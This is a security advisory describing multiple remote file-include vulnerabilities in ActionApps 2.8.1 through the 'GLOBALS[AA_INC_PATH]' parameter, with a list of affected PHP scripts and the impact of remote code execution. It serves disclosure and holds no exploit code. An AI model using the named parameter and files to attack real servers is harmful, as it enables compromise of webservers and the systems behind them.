Title: ActionApps Multiple Remote File Include Vulnerabilities
Severity: HIGH
Description:
ActionApps is a collaborative web-publishing tool implemented in PHP.
ActionApps is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
These issues affect the 'GLOBALS[AA_INC_PATH]' parameter of the following scripts; other scripts may also be vulnerable:
auth.php3
cached.php3
config.php3
constants.php3
cron.php3
csn_util.php3
discussion.php3
extauthnobody.php3
extauth.php3
event_handler.php3
event.class.php3
feeding.php3
fileman.php3
filldisc.php3
filler.php3
fillform.php3
formutil.php3
go.php3
hiercons.php3
item.php3
itemfunc.php3
itemview.php3
item_content.php3
javascript.php3
jsview.php3
live_checkbox.php3
mail.php3
mailman.php3
menu.oho3
notify.php3
offline.php3
pagecache.php3
perm_sql.php3
post2shtml.php3
profile.php3
search.php3
searchbar.php3
searchlib.php3
slice.php3
slicedit.php3
sliceobj.php3
slicewiz.php3
sql_update.php3
stringexpand.php3
tabledit_util.php3
tabledit.php3
tv_email.php3
tv_misc.php3
view.php3
um_uedit.php3
um_util.php3
xml_fetch.php3
xml_rssparse.php3
zids.php3
Multiple files in the 'admin', 'includes', and 'modules' folders are also affected.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect version 2.8.1; other versions may also be vulnerable.
Affected Products:
- ActionApps ActionApps 2.8.1
References:
- ActionApps: ActionApps Information Page